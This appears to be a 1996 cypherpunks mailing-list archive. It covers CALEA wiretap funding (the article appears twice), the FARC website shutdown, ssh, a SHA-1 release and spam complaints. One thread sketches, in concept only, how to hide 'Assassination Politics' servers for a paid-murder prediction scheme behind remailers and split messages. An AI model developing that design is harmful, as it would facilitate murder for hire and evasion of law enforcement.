will now have a vested interest in how the majority of your
communications are tapped.

The spending bill also provides for "multipoint wiretaps."  This is the
tricked up code phase for what amounts to roving wiretaps.  Where the
FBI can only tap one phone at a time in conjunction with an
investigation, it now wants the ability to "follow" a conversation from
phone to phone; meaning that if your neighbor is under investigation and
happens to use your phone for some reason, your phone gets tapped.    It
also means that the FBI can tap public pay phones... think about that
next time you call 1-800-COLLECT.

In addition, all the public and congressional accountability provisions
for how CALEA money was spent, which were in the original House version
(H.R. 3814), got torpedoed in the Senate Appropriations Committee.

Provisions stripped out by the Senate:

-- GONE: Money isn't to be spent unless an implementation plan is sent
to each member of the Judiciary Committee and Appropriations committees.

-- GONE:  Requirement that the FBI provide public details of how its new
wiretap plan exceeds or differs from current capabilities.

-- GONE:  Report on the "actual and maximum number of simultaneous
surveillance/intercepts" the FBI expects.   The FBI ran into a fire storm
earlier this year when it botched its long overdue report that said it
wanted the capability to tap one out of every 100 phones
*simultaneously*.   Now, thanks to this funding bill, rather than having
to defend that request, it doesn't have to say shit.

-- GONE:  Complete estimate of the full costs of deploying and
developing the digital wiretapping plan.

-- GONE:  An annual report to Congress "specifically detailing" how all
taxpayer money -- YOUR money -- is spent to carry out these new wiretap
provisions.

"No matter what side you come down on this (digital wiretapping) issue,
the stakes for democracy are that we need to have public accountability,"
said Jerry Berman, executive director of the Center for Democracy and
Technology.

Although it appeared that no one in congress had the balls to take on
the issue, one stalwart has stepped forward, Rep. Bob Barr (R-Ga.).  He
has succeeded in getting some of the accountability provisions back into
the bill, according to a Barr staffer.  But the fight couldn't have been
an easy one.   The FBI has worked congress relentlessly in an effort to
skirt the original reporting and implementation requirements as outlined
in CALEA.  Further, Barr isn't exactly on the FBI's Christmas card list.
Last year it was primarily Barr who scotched the funding for CALEA
during the 104th Congress' first session.

But Barr has won again.  He has, with backing from the Senate, succeeded
in *putting back* the requirement that the FBI must justify all CALEA
expenditures to the Judiciary Committee.   Further, the implementation
plan, "though somewhat modified" will "still have some punch," Barr's
staffer assured me.  That includes making the FBI report on its
expected capacities and capabilities for digital wiretapping. In other
words, the FBI won't be able to "cook the books" on the wiretap figures
in secret.  Barr also was successful in making the Justice Department
submit an annual report detailing its CALEA spending to Congress.

However, the funding for digital wiretaps remains.  Stuffing the funding
measures into a huge omnibus spending bill almost certainly assures its
passage. Congress is twitchy now, anxious to leave.  They are chomping
at the bit, sensing the end of the 104th Congress' tortured run as the
legislative calender is due to run out sometime early next week.  Then
they will all literally race from Capitol Hill at the final gavel,
heading for the parking lot, jumping in their cars like stock car
drivers as they make a made dash for National Airport to return to their
home districts in an effort to campaign for another term in the loopy
world of national politics.

Congress is "going to try to sneak this (spending bill) through the back
door in the middle of the night," says Leslie Hagan, legislative
director for the National Association of Criminal Defense Lawyers.  She
calls this a "worst case scenario" that is "particularly dangerous"
because the "deliberative legislative process is short-ciricutied."

Such matters as wiretapping deserve to be aired in the full sunlight of
congressional hearings, not stuffed into an 11th hour spending bill.
This is legislative cowardice.  Sadly, it will most likely succeed.

And through this all, the Net sits mute.

Unlike a few months ago, on the shameful day the Net cried "wolf" over
these same provisions, mindlessly flooding congressional switchboards
and any Email box within keyboard reach, despite the fact that the
funding provisions had been already been stripped from the
anti-terrorism bill, there has been no hue-and-cry about these most
recent moves.

Yes, some groups, such as the ACLU, EPIC and the Center for Democracy
and Technology have been working the congressional back channels,
buzzing around the frenzied legislators like crazed gnats.

But why haven't we heard about all this before now?  Why has  this bill
come down to the wire without the now expected flurry of "alerts"
"bulletins" and other assorted red-flag waving by our esteemed Net
guardians?  Barr's had his ass hanging in the wind, fighting FBI
Director Louis "Teflon" Freeh;  he could have used some political cover
from the cyberspace community.  Yet, if he'd gone to that digital well,
he'd have found only the echo of his own voice.

And while the efforts of Rep. Barr are encouraging, it's anything from a
done deal.  "As long as the door is cracked... there is room for
mischief," said Barr's staffer.   Meaning, until the bill is reported
and voted on, some snapperhead congressman could fuck up the process yet
again.

We all caught a bit of a reprieve here, but I wouldn't sleep well.  This
community still has a lot to learn about the Washington boneyard.
Personally, I'm a little tired of getting beat up at every turn.  Muscle
up, folks, the fight doesn't get any easier.

Meeks out...

------------

Declan McCullagh <declan@well.com> contributed to this report.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Adams <cadams@acucobol.com>
Date: Fri, 27 Sep 1996 09:03:27 +0800
To: cypherpunks@toad.com
Subject: Internet plug pulled on Colombia's guerrillas
Message-ID: <324AFE43.46BE@acucobol.com>
MIME-Version: 1.0
Content-Type: text/plain


Internet plug pulled on Colombia's
              guerrillas
              3:05pm EDT, 9/26/96

              BOGOTA, Colombia - A Colombian guerrilla group currently
              involved in a bloody offensive in the mountains and
jungles,
              suffered a setback in its propaganda battle when its
new-tech
              voice on the Internet was mysteriously silenced. 

              The Revolutionary Armed Forces of Colombia (FARC), which
              has periodically paralyzed half the country with road
blocks,
              found its route to the information superhighway barred. 

              The Communist insurgents, who rose up in arms in 1964,
              embraced new technology last year in their fight to
overthrow the
              government by launching a home page on the Internet. 

              But in unexplained circumstances, which a spokeswoman for
the
              Mexico City-based Internet provider Teesnet said may or
may
              not be linked to external pressures, the plug was pulled
on the
              service Monday -- a day after being publicized in
Colombia's
              leading daily, El Tiempo. 

              The FARC's Mexico City-based international spokesman Marco
              LeDon CalarcDa admitted the loss of the Internet page was
a
              serious reversal but vowed the computer-age conflict was
far
              from over. 

              "This is an attack on freedom of expression because we
were not
              doing anything illegal. I cannot say exactly how it
happened but
              the hand of the Colombian government is in this," he said. 

              "The FARC is used to difficulties and this is just the
latest
              challenge. One way or another we will get back on to the
              Internet." 

              The Colombian guerrillas used their worldwide web site to
              publish their political magazine Resistencia, whose
distribution is
              banned in Colombia, and to offer explanations about their
latest
              armed actions. 

              FARC, labeled narcoguerrillas since the 1980s when U.S.
              ambassador Lewis Tambs highlighted the group's alleged
              connections with Colombia's drugs trade, have been dubbed
              Cyberspace guerrillas since their appearance on the
Internet. 

              "Cyberspace guerrillas may seem a fun name but I think it
is
              pejorative and belittles what we're doing," said LeDon
CalarcDa.
              "We are looking to topple the government and set up a new
              Colombia. 

              "Using weapons naturally comes within the logic of the
armed
              struggle. Just fighting through the Internet would be like
shooting
              rubber bullets. Not using it would be like continuing to
fight the
              army with a 12-bore shotgun," he said. 

              In the four weeks since the FARC unleashed its latest
offensive
              with an attack on a jungle base in southern Putumayo
province,
              more than 150 soldiers, police and civilians have died.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 27 Sep 1996 08:39:05 +0800
To: cypherpunks@toad.com
Subject: Re: "Confessing to a felony"
In-Reply-To: <ae6f45b800021004a06e@[207.167.93.63]>
Message-ID: <v03007802ae70be85e0c3@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:37 PM -0400 9/26/96, Black Unicorn wrote:

>>
>> b. evidence that the "confession" can be backed up by other evidence
>>
>
>In the case of the export at hand, a passport record exists, and surely
>the notebook exists.  Were I a prosecutor with a bug in my rectum, I would
>think I had something of a case.

What evidence of any sort do they have that any particular notebook
computer was involved in the trip offshore? Seems to me this is a rather
major defect in the evidence chain.

--Tim May



We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: webwarrior@infowar.com
Date: Fri, 27 Sep 1996 06:59:36 +0800
To: news_from_wschwartau@infowar.com
Subject: Apology
Message-ID: <14383601200780@infowar.com>
MIME-Version: 1.0
Content-Type: text/plain


OOPS!   OUCH!!!     CRASH!!!


Yesterday our ListServ underwent emergency surgery and our Web Warriors say
all vital signs are stabilized.

A complete recovery is assured!

We apologize for the inconvenience.  Thank you for your understanding.

Winn  Schwartau 
and the folks at
Infowar.Com
Betty G.O'Hearn
Information Warfare and InfoSecurity
Assistant to Mr. Winn Schwartau
http://www.infowar.com
betty@infowar.com
280 126th Ave. E.#110
Treasure Island, FL  33706
813-367-7277  Voice
813-363-7277  FAX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Fri, 27 Sep 1996 07:01:34 +0800
To: PhneCards@aol.com
Subject: Re: An idle thought on CBC and block lengths
In-Reply-To: <960925181213_529562658@emout15.mail.aol.com>
Message-ID: <Pine.LNX.3.94.960926154509.2270C-100000@anx0918.slip.appstate.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Sep 1996 PhneCards@aol.com wrote:

> Date: Wed, 25 Sep 1996 18:12:14 -0400
> From: PhneCards@aol.com
> To: osborne@gateway.grumman.com, cypherpunks@toad.com
> Subject: Re: An idle thought on CBC and block lengths
> 
> Did you know this company is using your email address as part of
> an unlawful email bomb?
> 
> I would advise you to write to them at cypherpunks@toad.com
> and owner-cypherpunks@toad.com and advise them to stop
> using your email address for this type of activity.
> 
> It is illegal to use a invalid return email address.  If this continues, I
> will
> be forced to prosecute the return email address - which they are
> making to look like you.

Is it?  I beleive that if you look closely, you will discover hat all the
laws which would have made lying illegal on the 'Net have now been
repealed by more Federal judges than I can count on 1 hand...

> 
> Below is the letter that I received in my email box
> =================================================
> 
> In a message dated 96-09-25 15:52:17 EDT, you write:
> 
> >Subj:	An idle thought on CBC and block lengths
> >Date:	96-09-25 15:52:17 EDT
> >From:	osborne@gateway.grumman.com (Rick Osborne)
> >Sender:	owner-cypherpunks@toad.com
> >To:	cypherpunks@toad.com
> >
> >So I was sitting bored at home and thinking to myself: CBC is cool.
> >Without the key, you're screwed because a single bit error propagates
> >throughout the entire message.  But then I was thinking, yeah, but you can
> >still eventually get the ONE key.  So I began to wonder what the difference
> >in security is between encrypting an entire M with just one K in CBC, or
> >encrypting M with permutations of K over specific block lengths.
> >
> >On the one hand you've got just one key, which makes it that much harder to
> >find in the keyspace.  On the other hand, If evil interloper Eve gets her
> >hands it, she has to find all of the keys to get all of M.  (Assuming she
> >is using brute force and can't necessarily find the master K to permute
> >into the subkeys.)
> >
> >The downsides are of course that on the one side you've got just one key,
> >and once you get it, you get M.  But on the other hand, you can get any one
> >part of the message with less difficulty because of the higher number of
> >keys.  And, of course, if your master K is easy to brute force, then it's
> >actually worse than the first option.
> >
> >Does anyone have opinions / knowledge of which is better?
> >
> >
> >____________________________________________________________
> >Rick Osborne                     osborne@gateway.grumman.com
> >"The universe doesn't give you any points for doing things that are easy."
> >
> >
> >
> >----------------------- Headers --------------------------------
> >From cypherpunks-errors@toad.com  Wed Sep 25 15:51:46 1996
> >Return-Path: cypherpunks-errors@toad.com
> >Received: from mailhub.MyMail.Com (mailhub.mymail.com [206.247.118.1]) by
> >emin14.mail.aol.com (8.6.12/8.6.12) with SMTP id PAA04207 for
> ><phnecards@aol.com>; Wed, 25 Sep 1996 15:51:43 -0400
> >Received: from toad.com by mailhub.MyMail.Com (5.x/SMI-SVR4)
> >	id AA27411; Wed, 25 Sep 1996 13:47:22 -0600
> >Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id FAA16059
> for
> >cypherpunks-outgoing; Wed, 25 Sep 1996 05:57:39 -0700 (PDT)
> >Received: from gateway.grumman.com (gateway.grumman.com [192.86.71.8]) by
> >toad.com (8.7.5/8.7.3) with SMTP id FAA16054 for <cypherpunks@toad.com>;
> Wed,
> >25 Sep 1996 05:57:32 -0700 (PDT)
> >Message-Id: <3.0b19.32.19960925085644.0068cb90@gateway.grumman.com>
> >X-Sender: osborne@gateway.grumman.com
> >X-Mailer: Windows Eudora Pro Version 3.0b19 (32)
> >Date: Wed, 25 Sep 1996 08:56:45 -0400
> >To: cypherpunks@toad.com
> >From: Rick Osborne <osborne@gateway.grumman.com>
> >Subject: An idle thought on CBC and block lengths
> >Mime-Version: 1.0
> >Content-Type: text/plain; charset="us-ascii"
> >Sender: owner-cypherpunks@toad.com
> >Precedence: bulk
> 
> 
> 


 --Deviant
A casual stroll through a lunatic asylum shows that faith does not prove
anything.
		-- Friedrich Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dana W. Albrecht" <dwa@corsair.com>
Date: Fri, 27 Sep 1996 09:12:06 +0800
To: unicorn@schloss.li
Subject: Re: ssh - How widely used?
Message-ID: <199609262257.PAA05678@vishnu.corsair.com>
MIME-Version: 1.0
Content-Type: text/plain




Black Unicorn <unicorn@schloss.li> writes:
> Does anyone know if there are MS-Dos or Mac versions of the ssh client?

There is no MS-DOS client.  The authors claim that, "a Macintosh version
is in the works, and first versions are expected to be available in
August/September 1996."  There are Windoze and OS/2 clients.
 
> How much is ssh used?

>From the FAQ:

     6.2 How widespread is use of ssh?

     As with every piece of freely available software, this is difficult
     to find out. The best current estimates are that at least 1000
     insitutions in 40 countries use it. This estimate is based on The
     number of people on the ssh mailing list, around 600, from 40
     different countries and several hundred domains.  Each week, the
     ssh home pages are accessed from roughly 5000 different machines,
     many of them web caches; also, these machines often are different
     from week to week. 

> I've not seen much discussion of it but poking around an ISP yielded this:
> 
>        Ssh  (Secure  Shell)  a  program for logging into a remote
>        machine and for executing commands in  a  remote  machine.
>        It  is  intended  to  replace  rlogin and rsh, and provide
>        secure  encrypted  communications  between  two  untrusted
>        hosts over an insecure network.  X11 connections and arbi-
>        trary TCP/IP ports can also be forwarded over  the  secure
>        channel.

[ Snip ]

> Looks like a nice little implementation.
> 
> Comments anyone?

For further information about it, see:

     http://www.cs.hut.fi/ssh/

There is also a mailing list.  Subscription requests should be directed
to majordomo@clinet.fi with "subscribe ssh" in the message body.

I think that it's technically a great program.  However, I have heard
some pretty unpleasant stories about legal issues using it in a
commercial environment.

Dana W. Albrecht
dwa@corsair.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TV1 <comments@tv1.com>
Date: Fri, 27 Sep 1996 07:27:30 +0800
To: cypherpunks@toad.com
Subject: A Special Invitation to TV1 Users:
Message-ID: <199609262026.QAA14139@spirit.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The best things in life are still free-and some of them get even better! 

Once upon a time, you registered to use TV1, the only personalizable TV
listings site on the Internet. If you've been back to the site during the
past week, you would have noticed gargantuan, earth-shattering additions to
our humble old listings Web site.  TV1 has been incorporated into The GIST,
a full service home entertainment guide providing in-depth coverage of
what's worth watching on TV and the Internet, as well as original features
on everything from today's hottest television shows (with audio clips of
stars) to reviews of the latest home entertainment hardware.   

If you've been to TV1/TheGIST lately, we hope you've been enjoying our
service, and hope that you don't mind the fact that our graphic
improvements now require at least  a Netscape 2.0 or Explorer 3.0 browser.
Stick with us, and you'll be seeing even more great enhancements during the
next month. 

If you're one of those deprived Web surfers who hasn't seen the site in a
few weeks, c'mon back--and see what you've been missing.  Our new URL is 
www.theGist.com or you can still reach us at www.TV1.com.

Thanks.  We look forward to helping you with your home entertainment choices
tonight, and every night.

Your wannabee hosts, 





- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMkrm7SoZzwIn1bdtAQGILAF8DsqSWOeABIYPgOcXwyk6FLores03wa15
LGDwf//VqW+dwIj4XyNvPqGD/CpdE27L
=2Ss2
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lsurfer@cris.com (Randy Bradakis)
Date: Fri, 27 Sep 1996 07:48:19 +0800
To: cypherpunks@toad.com
Subject: Re: Stop Spammers Today!
In-Reply-To: <960925085324_292805914@emout19.mail.aol.com>
Message-ID: <vfuSyozvQIaZ091yn@cris.com>
MIME-Version: 1.0
Content-Type: text/plain


The former human known as "PhneCards@aol.com" wrote:

{Dear cypherpunks;

Hey, it knows who we are!

{In the last few days I have received numerous email coming from you but with
{fake return addresses from messages posted on newsgroups.  I must have been
{targeted because I am a bulk emailer.  Letting you know now that I am a
{legitimate bulk emailer compiling my list with the permission of each account
{holder.

Er, does it mean that someone subscribed it to the list?

{If this barrage of email does not cease immediately, I will be forced to take
{legal and maybe not so legal actions to defend myself.

This from a 'bulk emailer'?  'scure me while I snort.  :snort:
Against whom, exactly, would you take legal action against?

Hey, PhneCards, perhaps someone that was on your email list that wasn't 
exactly pleased with your assumptions of 'permission' subscribed you?
Don't get any ideas about it having been me, or even someone actually
on the list, as we see enough of this garbage as it is, and would have
most probably subscribed you to a coredump or clueless list.

{If you would like to discuss this further, please call me at 407-438-8892.

How about 'unsubscribe cypherpunks' in the message body of an email 
to majordomo@toad.com, instead?

-- 
no sig too small




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Fri, 27 Sep 1996 10:20:16 +0800
To: cypherpunks@toad.com
Subject: CWD -- Wiretap In the Night
Message-ID: <Pine.GSO.3.95.960926163247.19570J-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Thu, 26 Sep 1996 16:32:01 -0700 (PDT)
From: Declan McCullagh <declan@well.com>
To: fight-censorship@vorlon.mit.edu
Subject: CWD -- Wiretap In the Night






CyberWire Dispatch // September // Copyright (c) 1996 //

Jacking in from the "Smoked Filled Room" Port:

Washington, DC -- Federal provisions funding the digital telephony bill
and roving wiretaps, surgically removed earlier this year from an
anti-terrorism bill, have quietly been wedged into a $600 billion
omnibus spending bill.

The bill creates a Justice Department "telecommunications carrier
compliance fund" to pay for the provisions called for in the digital
telephony bill, formally known as the Communications Assistance in Law
Enforcement Act (CALEA).  In reality, this is a slush fund.

Congress originally budgeted $500 million for CALEA, far short of the
billions actually needed to build in instant wiretap capabilities into
America's telephone, cable, cellular and PCS networks.  This bill now
approves a slush fund of pooled dollars from the budgets of "any
agency" with "law enforcement, national security or intelligence
responsibilities."  That means the FBI, CIA, NSA and DEA, among
others, will now have a vested interest in how the majority of your
communications are tapped.

The spending bill also provides for "multipoint wiretaps."  This is the
tricked up code phase for what amounts to roving wiretaps.  Where the
FBI can only tap one phone at a time in conjunction with an
investigation, it now wants the ability to "follow" a conversation from
phone to phone; meaning that if your neighbor is under investigation and
happens to use your phone for some reason, your phone gets tapped.    It
also means that the FBI can tap public pay phones... think about that
next time you call 1-800-COLLECT.

In addition, all the public and congressional accountability provisions
for how CALEA money was spent, which were in the original House version
(H.R. 3814), got torpedoed in the Senate Appropriations Committee.

Provisions stripped out by the Senate:

-- GONE: Money isn't to be spent unless an implementation plan is sent
to each member of the Judiciary Committee and Appropriations committees.

-- GONE:  Requirement that the FBI provide public details of how its new
wiretap plan exceeds or differs from current capabilities.

-- GONE:  Report on the "actual and maximum number of simultaneous
surveillance/intercepts" the FBI expects.   The FBI ran into a fire storm
earlier this year when it botched its long overdue report that said it
wanted the capability to tap one out of every 100 phones
*simultaneously*.   Now, thanks to this funding bill, rather than having
to defend that request, it doesn't have to say shit.

-- GONE:  Complete estimate of the full costs of deploying and
developing the digital wiretapping plan.

-- GONE:  An annual report to Congress "specifically detailing" how all
taxpayer money -- YOUR money -- is spent to carry out these new wiretap
provisions.

"No matter what side you come down on this (digital wiretapping) issue,
the stakes for democracy are that we need to have public accountability,"
said Jerry Berman, executive director of the Center for Democracy and
Technology.

Although it appeared that no one in congress had the balls to take on
the issue, one stalwart has stepped forward, Rep. Bob Barr (R-Ga.).  He
has succeeded in getting some of the accountability provisions back into
the bill, according to a Barr staffer.  But the fight couldn't have been
an easy one.   The FBI has worked congress relentlessly in an effort to
skirt the original reporting and implementation requirements as outlined
in CALEA.  Further, Barr isn't exactly on the FBI's Christmas card list.
Last year it was primarily Barr who scotched the funding for CALEA
during the 104th Congress' first session.

But Barr has won again.  He has, with backing from the Senate, succeeded
in *putting back* the requirement that the FBI must justify all CALEA
expenditures to the Judiciary Committee.   Further, the implementation
plan, "though somewhat modified" will "still have some punch," Barr's
staffer assured me.  That includes making the FBI report on its
expected capacities and capabilities for digital wiretapping. In other
words, the FBI won't be able to "cook the books" on the wiretap figures
in secret.  Barr also was successful in making the Justice Department
submit an annual report detailing its CALEA spending to Congress.

However, the funding for digital wiretaps remains.  Stuffing the funding
measures into a huge omnibus spending bill almost certainly assures its
passage. Congress is twitchy now, anxious to leave.  They are chomping
at the bit, sensing the end of the 104th Congress' tortured run as the
legislative calender is due to run out sometime early next week.  Then
they will all literally race from Capitol Hill at the final gavel,
heading for the parking lot, jumping in their cars like stock car
drivers as they make a made dash for National Airport to return to their
home districts in an effort to campaign for another term in the loopy
world of national politics.

Congress is "going to try to sneak this (spending bill) through the back
door in the middle of the night," says Leslie Hagan, legislative
director for the National Association of Criminal Defense Lawyers.  She
calls this a "worst case scenario" that is "particularly dangerous"
because the "deliberative legislative process is short-circuited."

Such matters as wiretapping deserve to be aired in the full sunlight of
congressional hearings, not stuffed into an 11th hour spending bill.
This is legislative cowardice.  Sadly, it will most likely succeed.

And through this all, the Net sits mute.

Unlike a few months ago, on the shameful day the Net cried "wolf" over
these same provisions, mindlessly flooding congressional switchboards
and any Email box within keyboard reach, despite the fact that the
funding provisions had been already been stripped from the
anti-terrorism bill, there has been no hue-and-cry about these most
recent moves.

Yes, some groups, such as the ACLU, EPIC and the Center for Democracy
and Technology have been working the congressional back channels,
buzzing around the frenzied legislators like crazed gnats.

But why haven't we heard about all this before now?  Why has  this bill
come down to the wire without the now expected flurry of "alerts"
"bulletins" and other assorted red-flag waving by our esteemed Net
guardians?  Barr's had his ass hanging in the wind, fighting FBI
Director Louis "Teflon" Freeh;  he could have used some political cover
from the cyberspace community.  Yet, if he'd gone to that digital well,
he'd have found only the echo of his own voice.

And while the efforts of Rep. Barr are encouraging, it's anything from a
done deal.  "As long as the door is cracked... there is room for
mischief," said Barr's staffer.   Meaning, until the bill is reported
and voted on, some snapperhead congressman could fuck up the process yet
again.

We all caught a bit of a reprieve here, but I wouldn't sleep well.  This
community still has a lot to learn about the Washington boneyard.
Personally, I'm a little tired of getting beat up at every turn.  Muscle
up, folks, the fight doesn't get any easier.

Meeks out...

------------

Declan McCullagh <declan@well.com> contributed to this report.

###







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Fri, 27 Sep 1996 10:16:02 +0800
To: cypherpunks@toad.com
Subject: Public domain SHA-1 in C
Message-ID: <Pine.BSF.3.91.960926163530.518A-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've written an implementation of SHA-1 in C. Public domain, so you can
hack it to your hearts content and/or use it however you want. You can
download it from
http://www.edmweb.com/steve/sha1.c

It's not hard to use. Allocate a SHA1_CTX, initialize it with SHA1Init()
run over the data with SHA1Update() and finally extract the result using
SHA1Final(). Or just compile the program as-is and use it to hash files. 

It's reasonably fast (the 80 core SHA operations look good) but I'm
certain that there's room for improvement. 

Tested under FreeBSD 2.1.0-RELEASE on an i486SX. The three test vectors
from FIPS PUB 180-1 hash correctly.


=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 |
|          -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. --          |
===================================================================:)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQEVAwUBMksSsNtVWdufMXJpAQFV3AgApaK+upwWtBJZUwq5Pr4cpvjWQcxFHxv6
XEoZmwgwzR94lpjdEK5GPXt7U9HTp+xiwiaeQ7Hjg+iuR/qtofwZlZhQ5EmyBl2M
8rnFSRgwR4NH1y2PwAxQKSo2SaHU8JZ3X3D6Yk1WXAqk90vN8dzQAIa8B409IuhM
tBPixrS6d0KsySSOHQkWO7Mqij43wZOnrgikJF3IDCvSf0us8gGC9wZjdIax3Rgr
soswtQvT6QpZDZ/+39UiA2RSMFuER/S3NbZZSJdfIGK1XzUeU2MUC4NmURlc/ntz
3B1pd+jovxuHW1D/TQ2jHSIdg1Yol/zeu1OeuuhL37QOQAVkupgVUA==
=B73M
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Fri, 27 Sep 1996 13:56:54 +0800
To: Jean-Francois Avon <jf_avon@citenet.net>
Subject: Re: Hallam-Baker demands more repudiations or he'll write!
In-Reply-To: <9609261727.AA03280@cti02.citenet.net>
Message-ID: <Pine.SUN.3.91.960926165048.8310C-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Anonymity and nonescrowed crypto are the linchpins of AP and its more 
general case, Maysian crypto anarchy. The withering of the nation-state. 
Whatever you want to call it.

To prevent it, governments will ban both. A criminal law, passed in the
wake of say a bombing this fall in Washington, DC, banning nonescrowed
crypto. (Freeh will assert he has evidence the terrorists used PGPhone.)
And another law banning online anonymity. 

What then, Mr. Bell?

-Declan




On Thu, 26 Sep 1996, Jean-Francois Avon wrote:

> On 26 Sep 96 at 10:49, Brian Davis wrote:
> 
> > If by "operation effectiveness" you mean some people will be killed,
> > I agree.  I also agree with the fire/water comment (maybe in more
> > ways than one!); my comment related to my belief that AP-supporters
> > shouldn't complain about especially draconian measures taken against
> > them by governments, given their modus operandi.
> 
> I don't think that any of them will complain because they understand 
> the nature of it.  I think that Jim Bell (forgive me Jim...:) view 
> that there will be only limited retaliation from government is not 
> guaranteed at all.  As I said somewhere previously, the whole thing 
> will depend on how the authorities view AP as (non-) attackable.  
> 
> Here is the post I wrote earlier:
> 
> ------- earlier post -------
> 
> jim bell recently wrote:
> 
> > Local police action against an AP organization would, of course, be
> > deterred by the prospect of naming anybody who would go after it,
> > and soliciting donations against them.  
> 
> I don't agree here.  It would all be a matter of timing, unless the
> number of AP servers would be sprouting out faster than police forces
> would be able to destroy them.  You have to realize that if the money
> is seized, noboby will be willing to make a hit since the odds of
> being paid are not too good.  Just play the game "Command and Conquer"
> for a while and you'll see.  Money is fuel.  Don't run off of it!
> 
> For that reason, I think that any AP server, *at the introduction of
> the concept*  would have to be a covert operation.  Servers could come out in
> public light when their number be large enough to warrant a
> strike on anybody trying to eliminate them.  Same for the
> publication of the name of the individuals operating the server.
> 
> To me, this seems obvious.  Comments?
> 
> To go on along that line, I had the idea that a specific piece of
> software, a bit like Private Idaho, that would chain remailers but
> that would be specifically designed to handle predictions, would
> have be designed.
> 
> (Pardon my ignorance of the net here)
> 
> The server need not to be a unique address.  Actually, the
> prediction and any accompanying documents could be splitted a la
> Secure Split, and sent to N differents servers, M (<N) of which
> would be required to re-assemble the original prediction.  This
> assures that if one gets closed, the other can rebuild the message.
> 
> If thoses servers were set up on *large* machines servicing tens of
> thousands of messages a day, preferably located at a busy remailer
> location, any exchange of information between them to rebuild the
> prediction at a central location would not be easy to track by any 
> govt.
> 
> Comments?
> 
> ----- end of earlier post -----
> Jean-Francois Avon, Montreal QC Canada
>  DePompadour, Societe d'Importation Ltee
>     Finest Limoges porcelain and crystal
>  JFA Technologies, R&D consultant
>     physicists and engineers, LabView programming
> PGP keys at: http://w3.citenet.net/users/jf_avon
> ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
>  
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "! Drive" <drink@aa.net>
Date: Fri, 27 Sep 1996 12:30:14 +0800
To: <cypherpunks@toad.com>
Subject: PGP interfaces for MS Internet Mail
Message-ID: <199609270008.RAA16947@ws6.aa.net>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone know of any PGP programs that interface well with Microsofts
Internet Mail (not Exchange mail)


Thanks





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Fri, 27 Sep 1996 12:29:08 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: ssh - How widely used?
In-Reply-To: <Pine.SUN.3.94.960926174203.498E-100000@polaris>
Message-ID: <Pine.3.89.9609261747.A4961-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain





On Thu, 26 Sep 1996, Black Unicorn wrote:

> 
> Does anyone know if there are MS-Dos or Mac versions of the ssh client?
> How much is ssh used?

Uni,
SSH is used, as most security software is, by security aware individuals. I 
would love to say that means "widely", but unfortunately that isn't the 
case. For what is worth, SSH has my personal seal of approval. Use it. 

The UNIX version is freeware. The Windows version is commercially 
available at http://www.datafellows.com/

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 27 Sep 1996 14:24:42 +0800
To: cypherpunks@toad.com
Subject: Is "Black Unicorn" a lawyer, or just a nym used by a lawyer?
Message-ID: <199609270017.RAA18940@dfw-ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May said, in a discussion on another topic
        While BU is a lawyer, and I am not, I maintain
        [........]
Is it correct to say that "Black Unicorn is a lawyer",
or only that the nym "Black Unicorn" is used by a person
who's a lawyer under another name?  "Black Unicorn" at least doesn't
appear to be a _practicing lawyer_, though maybe [name used for legal
work by person who also uses nym "Black Unicorn"] is a practicing lawyer.

Tim's signature file no longer asserts that he's a Licensed Ontologist,
but this seems to be the kind of question you'd ask a L.O. if you knew one.  

